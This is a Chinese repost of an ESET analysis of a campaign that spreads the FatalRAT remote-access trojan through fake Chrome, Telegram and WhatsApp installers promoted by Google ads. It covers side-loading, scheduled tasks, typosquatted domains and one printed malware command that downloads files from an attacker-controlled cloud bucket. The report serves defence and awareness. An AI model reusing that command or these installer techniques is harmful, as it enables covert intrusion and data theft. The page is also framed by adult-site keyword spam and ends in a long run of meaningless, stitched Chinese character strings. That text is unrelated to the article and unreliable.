国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

警惕:針對中文用戶的虛假安裝程序正在盛行

安全 應(yīng)用安全
近日,ESET的安全研究人員發(fā)現(xiàn)了一種針對東南亞和東亞華裔人群的惡意軟件活動。攻擊者通過在Google搜索結(jié)果中購買誤導(dǎo)性廣告,誘騙受害者下載安裝木馬安裝程序。

近日,ESET的安全研究人員發(fā)現(xiàn)了一種針對東南亞和東亞華裔人群的惡意軟件活動。攻擊者通過在Google搜索結(jié)果中購買誤導(dǎo)性廣告,誘騙受害者下載安裝木馬安裝程序。未知的攻擊者創(chuàng)建了虛假網(wǎng)站,看起來類似于火狐瀏覽器、WhatsApp或Telegram等流行應(yīng)用程序的網(wǎng)站,但除了提供合法軟件外,他們還提供了一種遠程訪問木馬FatalRAT,使攻擊者能夠控制受害的計算機設(shè)備。

關(guān)鍵發(fā)現(xiàn)

  • 攻擊者購買廣告,將他們的惡意網(wǎng)站定位在谷歌搜索結(jié)果的“贊助”部分。在ESET向谷歌報告此問題后,谷歌已將這些惡意廣告移除。
  • 這些網(wǎng)站大多數(shù)使用的是中文并且提供軟件的中文版本,這表明攻擊者主要針對的是華語人群。
  • 調(diào)查數(shù)據(jù)顯示,受害者大多在東南亞和東亞,這表明廣告針對的是該地區(qū)。
  • ESET在2022年8月至2023年1月期間觀察到這些攻擊,但根據(jù)其遙測數(shù)據(jù)顯示,至少從2022年5月開始這些虛假安裝程序就已經(jīng)開始運行。
  • 在這次攻擊中使用的惡意軟件或網(wǎng)絡(luò)基礎(chǔ)設(shè)施都沒有與任何已命名組織的已知活動相匹配,因此目前ESET還沒有將此活動歸因于任何已知組織。

受害者研究

根據(jù)ESET提供的攻擊熱圖顯示,2022年8月至2023年1月期間,大多數(shù)攻擊影響了中國大陸及香港和臺灣地區(qū)。其他少數(shù)受害群體依次來自馬來西亞、日本、菲律賓、泰國、新加坡、印度尼西亞和緬甸。


【圖1:2022年8月至2023年1月期間,ESET檢測到的受害者地理分布】

攻擊概況

圖2展示了攻擊的簡單概況。由多個組件組成的鏈條最終會安裝AT&T研究人員于2021年8月發(fā)現(xiàn)的FatalRAT惡意軟件。據(jù)悉,這是一種遠程訪問木馬,允許攻擊者獲取受害者計算機設(shè)備的控制權(quán),包括執(zhí)行任意shell命令、下載運行文件、從網(wǎng)絡(luò)瀏覽器竊取數(shù)據(jù)以及捕獲鍵入信息等。

【圖2:攻擊的簡單概況】

虛假網(wǎng)站

攻擊者注冊了各種域名,這些域名都指向同一個IP地址:一個服務(wù)器托管多個下載木馬軟件的網(wǎng)站。其中一些網(wǎng)站看起來與合法網(wǎng)站一模一樣,但卻提供惡意安裝程序。其他可能由攻擊者翻譯的網(wǎng)站則提供了中國人無法使用的軟件的中文版本,如Telegram,詳見圖3。

【圖3:傳遞 FatalRAT惡意軟件的虛假Telegram網(wǎng)站】

ESET觀察了這些應(yīng)用程序的惡意網(wǎng)站和安裝程序,按受歡迎程度排序大致為:

  • Chrome;
  • Firefox;
  • Telegram;
  • WhatsApp;
  • Line;
  • Signal;
  • Skype;
  • Electrum比特幣錢包;
  • 搜狗拼音輸入法;
  • 有道詞典;
  • WPS Office。

更多其他虛假網(wǎng)站詳見圖4。結(jié)果顯示,除了Electrum比特幣錢包網(wǎng)站外,其他網(wǎng)站都是中文網(wǎng)站,這表明攻擊者主要針對華語群體。

【圖4:攻擊者為提供惡意安裝程序而創(chuàng)建的虛假網(wǎng)站】

從理論上講,潛在的受害者有很多可能的途徑被引導(dǎo)到這些虛假網(wǎng)站,一家新聞網(wǎng)站報道稱,當(dāng)他們在谷歌中搜索Firefox瀏覽器時,會看到一則廣告,引導(dǎo)他們進入這些惡意網(wǎng)站之一。我們無法重現(xiàn)這樣的搜索結(jié)果,但相信這些廣告只提供給了目標(biāo)地區(qū)的用戶。

據(jù)悉,在ESET向谷歌報告此問題后,谷歌已將這些惡意廣告移除。

【圖5:Firefox的搜索結(jié)果中,有一個虛假網(wǎng)站的廣告】

鑒于攻擊者為其網(wǎng)站注冊的許多域名與合法域名非常相似,攻擊者也有可能依靠拼寫錯誤來吸引潛在的受害者訪問他們的網(wǎng)站。一些例子包括:

  • telegraem. org(假的)VS. telegram.org(合法的);
  • electrumx. org(假的)VS. electrum.org(合法的);
  • youedao. Com(假的)VS.youdao.com(合法的);

安裝程序

從虛假網(wǎng)站下載的安裝程序并不是托管在與網(wǎng)站相同的服務(wù)器上,而是托管在阿里云對象存儲服務(wù)(Alibaba Cloud Object Storage Service)中。它們是用高級安裝程序創(chuàng)建的數(shù)字簽名MSI文件。圖6顯示了攻擊者在2023年1月6日上載到云存儲的惡意安裝程序。

【圖6:2023年1月6日,攻擊者將惡意安裝程序上傳到云存儲】

當(dāng)執(zhí)行這些安裝程序時,它們通常:

  • 在%PROGRAMDATA%\Progtmy目錄下,刪除并執(zhí)行惡意加載程序,以及運行FatalRAT惡意軟件所需的文件;
  • 刪除%PROGRAMDATA%\Progtmy\0目錄中的惡意更新程序和相關(guān)文件;
  • 在%USERPROFILE%目錄中放置一個名為ossutilconfig的文件。此文件包含更新程序用于連接到阿里云中的遠程桶的憑據(jù);
  • 創(chuàng)建一個空目錄%PROGRAMDATA%\Progptp,不過我們觀察到一些情況下FatalRAT惡意軟件會被安裝在這個目錄中;
  • 刪除并執(zhí)行C:\Program Files\Common Files中的合法安裝程序;
  • 創(chuàng)建計劃任務(wù)以執(zhí)行加載程序和更新程序組件;

該惡意軟件通過側(cè)載(side-loading)惡意DLL libpng13.dll運行,該DLL被sccs.exe(瀏覽器支持模塊)使用,sccs.exe是迅雷開發(fā)的合法可執(zhí)行文件。原始libpng13.dll也包含在安裝包中(重命名為一個隨機名稱),因為惡意DLL將其導(dǎo)出的函數(shù)轉(zhuǎn)發(fā)到原始DLL。惡意DLL中轉(zhuǎn)發(fā)的一些導(dǎo)出如圖7所示。圖像顯示,在本例中,原始DLL被重命名為BHuedjhd.dll,惡意DLL被編譯為Dll22.dll。

【圖7:在惡意DLL中被轉(zhuǎn)發(fā)到原DLL的部分導(dǎo)出函數(shù)】

惡意軟件更新程序以類似的方式執(zhí)行,通過側(cè)載dr.dll,由騰訊開發(fā)的合法簽名二進制文件使用。惡意DLL非常簡單,并執(zhí)行OSSUTIL(包含在安裝包中的su.exe)從攻擊者控制的阿里云桶中下載文件。DLL執(zhí)行的命令是:

cmd /C “C:\ProgramData\Progtmy\2\ssu.exe cp -r oss://occ-a1/dll/3/ C:\ProgramData\Progtmy\ –update”

這應(yīng)該從遠程存儲桶occ-a1(與用于存儲安裝程序的桶不同,但在同一個帳戶中)更新%PROGRAMDATA%\Progtmy本地目錄中的文件,但是它在我們分析的任何安裝程序中都不起作用,因為%PROGRAMDATA%\Progtmy\2子目錄不存在(它應(yīng)該是由安裝程序創(chuàng)建的子目錄0)。

攻擊者在為更新程序創(chuàng)建的計劃任務(wù)上犯了同樣的錯誤,因為執(zhí)行路徑也引用了不存在的子目錄2。在大多數(shù)情況下,會創(chuàng)建四個計劃任務(wù):兩個用于RAT(一組定期執(zhí)行,另一組在任何用戶登錄到PC時執(zhí)行),兩個用于更新程序。任務(wù)的名稱基于Windows構(gòu)建號和計算機名稱,如圖8所示。

【圖8:由惡意安裝程序創(chuàng)建的計劃任務(wù)】

加載程序

加載程序libpng13.dll是一個非常簡單的組件,它在內(nèi)存中打開并執(zhí)行一個名為Micr.jpg的文件,該文件位于和DLL相同的目錄中。攻擊者通過多次調(diào)用只打印一些硬編碼值的函數(shù)來混淆加載程序。使用此行為可能是為了避免被安全解決方案檢測到,或使DLL的分析復(fù)雜化。

【圖9:左邊顯示了混淆的代碼,右邊顯示了去混淆的代碼】

Micr.jpg實際上是包含嵌入式DLL的shellcode。該shellcode的目的是通過調(diào)用名為SignalChromeElf的DLL的導(dǎo)出函數(shù)來加載并在內(nèi)存中執(zhí)行嵌入式DLL。在執(zhí)行這個導(dǎo)出函數(shù)之前,shellcode重構(gòu)DLL的導(dǎo)入表并調(diào)用DllEntryPoint,它簡單地調(diào)用Windows API函數(shù)DisableThreadLibraryCalls來增加DLL的隱蔽性。

SignalChromeElf本質(zhì)上將解密、加載并執(zhí)行嵌入DLL中的加密有效載荷。這個加密的有效載荷是FatalRAT惡意軟件,在它解密后,DLL將找到一個名為SVP7的導(dǎo)出函數(shù)的地址,其中包含惡意軟件的入口點,并調(diào)用它,將FatalRAT的加密配置作為參數(shù)傳遞。

嵌入式DLL中解密有效負(fù)載的函數(shù)與FatalRAT中用于解密其配置的函數(shù)相同。圖10顯示了該函數(shù)的一個示例。

FatalRAT

FatalRAT是一種遠程訪問木馬,由AT&T Alien Labs于2021年8月記錄。這種惡意軟件提供了一組功能,在受害者的計算機上執(zhí)行各種惡意活動。例如,該惡意軟件可以:

  • 捕獲按鍵信息;
  • 改變受害者的屏幕分辨率;
  • 終止瀏覽器進程并竊取或刪除其存儲的數(shù)據(jù),目標(biāo)瀏覽器是:Chrome、火狐、QQ以及搜狗;
  • 下載并執(zhí)行一個文件;
  • 執(zhí)行shell命令;

該惡意軟件包含各種檢查,以確定它是否在虛擬環(huán)境中運行。根據(jù)其配置,這些檢查可能被執(zhí)行,也可能不被執(zhí)行。

根據(jù)ESET的分析結(jié)果可以確定這次活動中使用的FatalRAT版本與AT&T在其博文中記錄的版本非常相似,所以這里不會贅述更多細(xì)節(jié)。圖11顯示了它們之間的比較,圖10顯示了用于解密來自該活動的FatalRAT樣本中的字符串的反編譯代碼,這與AT&T所描述的相同。

【圖10:FatalRAT樣本用于解密其配置字符串的函數(shù)的反編譯代碼】

【圖11:AT&T分析的FatalRAT樣本與該活動中發(fā)現(xiàn)的FatalRAT樣本之間的BinDiff比較】

先前版本

ESET研究人員還發(fā)現(xiàn)了攻擊者至少從2022年5月就開始使用的惡意安裝程序的先前版本。與上述安裝程序不同,這個版本包含一個xor加密的有效負(fù)載,分為三個文件:Micr. Flv、Micr2. flv以及Micr3. flv。每個文件都用不同的單字節(jié)XOR密鑰加密。一旦解密,這三個文件的內(nèi)容將被連接起來,形成與C&C服務(wù)器聯(lián)系以下載和執(zhí)行進一步shellcode的shellcode。

在這種情況下,加載程序DLL被命名為dr.dll——與安裝程序的后續(xù)版本中用于更新機制的名稱相同,由相同的合法可執(zhí)行文件側(cè)加載。鑒于這個舊版本似乎沒有更新程序,研究人員認(rèn)為攻擊者自2022年8月以來已經(jīng)用新版本的安裝程序取代了它。

結(jié)語

攻擊者花費了很大精力,試圖將其網(wǎng)站使用的域名盡可能地與官方名稱相似。在大多數(shù)情況下,虛假網(wǎng)站甚至是合法網(wǎng)站的相同副本。至于木馬安裝程序,它們會安裝用戶感興趣的實際應(yīng)用程序,從而盡可能地避免被懷疑。由于所有這些原因,我們看到在下載軟件之前仔細(xì)檢查我們訪問的URL是多么重要。更好的做法是,在檢查它是否是實際的供應(yīng)商站點后,再將它輸入到瀏覽器的地址欄中。

由于這次活動使用的惡意軟件FatalRAT包含了用于操縱來自不同瀏覽器數(shù)據(jù)的各種命令,而且受害者并不是針對特定類型的用戶,因此任何人都可能受到影響。攻擊者可能只對竊取網(wǎng)絡(luò)證書等信息感興趣,并在地下論壇上出售它們,或?qū)⑺鼈冇糜诹硪环N類型的犯罪軟件活動,但目前還不可能將這種活動具體歸因于已知或新的威脅行為者。

責(zé)任編輯:華軒 來源: 今日頭條
相關(guān)推薦

2023-07-03 22:30:27

2022-01-19 10:34:46

數(shù)據(jù)泄露網(wǎng)絡(luò)欺詐

2023-06-14 16:29:51

2020-02-07 17:02:25

新冠病毒疫情網(wǎng)絡(luò)安全

2014-02-14 13:32:29

2025-04-02 07:45:00

加密貨幣黑客惡意軟件

2021-02-02 10:41:29

Ubuntu安裝程序開發(fā)人員

2009-10-26 13:05:03

插件

2010-08-19 11:27:24

2021-12-07 18:39:19

黑客虛假廣告惡意軟件

2023-02-20 14:26:16

2022-05-19 14:36:54

SQL Server服務(wù)器暴力攻擊

2023-03-11 22:24:11

2025-06-09 00:20:00

CISOGenAIAI

2012-05-07 08:18:42

程序日志性能

2020-06-17 15:02:26

基礎(chǔ)設(shè)施網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)安全

2013-09-09 11:37:19

卡巴斯基木馬QVOD

2013-12-12 16:36:03

2022-11-09 06:44:37

2023-09-04 15:59:09

點贊
收藏

51CTO技術(shù)棧公眾號

欧美激情成人在线视频| 成人精品水蜜桃| 日韩欧美专区| 亚洲精品一区在线观看| sis001欧美| 亚洲欧美日韩网| 色狠狠一区二区三区| 免费av一区二区| 国产欧美日韩精品一区二区免费 | 永久久久久久| 欧美日韩精选| 国产精品一区二区在线观看| 在线看片一区| 久久本道综合色狠狠五月| 精品国精品国产自在久国产应用 | 91精品中文在线| av不卡高清| 久久久av免费| av一区二区高清| 激情视频在线观看一区二区三区| 日本不卡一二三区黄网| 999香蕉视频| 色天天综合色天天久久| 中文字幕一区久| 青青草国产精品一区二区| 国产伦理一区| aaaaaa亚洲| 欧美日韩一卡二卡三卡| 成人国产在线| 91亚洲精品一区| 国产麻豆精品视频| 午夜激情影院| 亚洲国产成人久久综合| 北条麻妃一区二区三区在线观看 | 成人动漫中文字幕| 一级二级在线观看| 亚洲人成电影在线观看天堂色| 亚洲自拍电影| 亚洲精品偷拍视频| 欧美专区福利在线| 精品久久久影院| 男人的天堂av高清在线| 亚洲精品日韩激情在线电影| 老色鬼久久亚洲一区二区| 中文字幕剧情在线观看一区| 国产日韩精品久久久| 丁香花高清电影在线观看完整版| 日韩欧美中文第一页| 韩国女主播一区二区| 日韩中文在线字幕| 色综合天天综合网中文字幕| 日韩人妻一区二区三区蜜桃视频| 一个色综合网站| 久久久精品一区二区毛片免费看| 不卡一卡2卡3卡4卡精品在| 久久久噜噜噜久久人人看| gogo在线高清视频| 国产suv精品一区二区| 福利视频网站一区二区三区| 亚洲视频tv| 国产精品入口免费视| 99在线精品免费| 黄视频在线免费看| 91在线观看免费高清完整版在线观看 | 久久99精品视频| 国产资源在线观看| 91精品国产沙发| 成人免费毛片aaaaa**| 黄色国产网站在线播放| 92看片淫黄大片欧美看国产片| 国产精品美女久久久久久久久久久| 成人性生活视频| 日本精品免费| 精品视频一区三区九区| 久久一级电影| 色偷偷免费视频| 欧美劲爆第一页| 99精品国产99久久久久久白柏| 黄视频网站在线观看| 日韩国产精品一区二区| 欧美高清视频不卡网| 亚洲国产导航| 超碰97在线免费观看| 成人av资源网| 丝袜美腿成人在线| a欧美人片人妖| www欧美xxxx| 干日本少妇视频| 中文字幕亚洲第一| 国产精品免费视频观看| 群体交乱之放荡娇妻一区二区| 成人免费淫片| 日本不卡一区二区三区在线观看| 3p视频在线观看| 91久久精品国产| 五月婷婷综合网| 91综合久久| 深夜福利视频一区| 亚洲va码欧洲m码| 欧美日韩亚洲精品一区二区三区| 欧美最新另类人妖| 资源视频在线播放免费| 成人精品一区二区三区电影黑人| 亚洲成人一区二区| 亚洲第一天堂| 免费国产在线观看| 91免费看片网站| 色婷婷av一区二区三区大白胸| 一区二区三区网站| 日韩精品系列| 好吊色欧美一区二区三区四区| 欧美日韩国产综合一区二区 | 国产片一区二区| 色天天色综合| 成年人在线播放| 国产一级二级三级精品| 欧美大片一区二区| 国产999精品久久久久久| 99综合99| jizz国产| 亚洲jizzjizz日本少妇| 91精品国产乱| 成人少妇影院yyyy| 亚洲人成伊人成综合图片| 伊人中文字幕在线| 精品中文字幕一区| 亚洲韩国日本中文字幕| 成人中文字幕在线| 日韩精选在线| 加勒比一区二区三区| 成年人免费在线播放| 91极品视频在线观看| 男女私大尺度视频| 久久涩涩网站| 成人欧美视频在线| 欧美一级片一区| 国产一区二区三区三区在线观看| 色伊人久久综合中文字幕| 欧美性xxxx在线播放| 日韩中文影院| 2020中文字幕在线| 国产中文一区二区| 在线视频欧美日韩精品| 一区二区三区欧美日| 在线一区视频| 精品伊人久久| 黄色片在线免费观看| 中国一级大黄大黄大色毛片| 97视频在线播放| 欧美一区二区三区性视频| 国模极品一区二区三区| 日韩高清a**址| 偷拍日韩校园综合在线| 国产一区二区三区四区五区入口| 国产一区二区三区免费| 亚洲最新视频在线播放| 精品国产99国产精品| 国产欧美高清| 国产精品一区二区精品| 欧美日韩国产亚洲沙发| 久久这里只有精品23| 成人激情av在线| 中文字幕av一区二区| 日韩欧美亚洲成人| www.欧美色图| 亚洲经典视频在线观看| 视频一区日韩| heyzo在线| 水莓100在线视频| 国产视频在线视频| 午夜婷婷国产麻豆精品| 亚洲成在线观看| 97国产精品人人爽人人做| 国产精品老女人视频| 国产伦精品一区二区三区照片| 五月天久久狠狠| 久久综合伊人77777麻豆最新章节| 丰满少妇又爽又紧又丰满69| 9色在线观看| 一区二区三区国产好| 一区二区福利| 99免在线观看免费视频高清| 欧美亚洲国产视频| 国产一区二区三区不卡在线| 天天综合在线观看| 亚洲剧情一区二区| 午夜精彩视频在线观看不卡| 99久久婷婷国产综合精品电影 | 日韩在线观看av| 日韩午夜激情av| 亚洲一区二区三区精品在线| 99精品热视频| 久久99深爱久久99精品| 欧美91大片| 成人在线国产| 亚州av一区| 加勒比视频一区| 色综合.com| 国产极品久久久久久久久波多结野| 哥也色在线视频|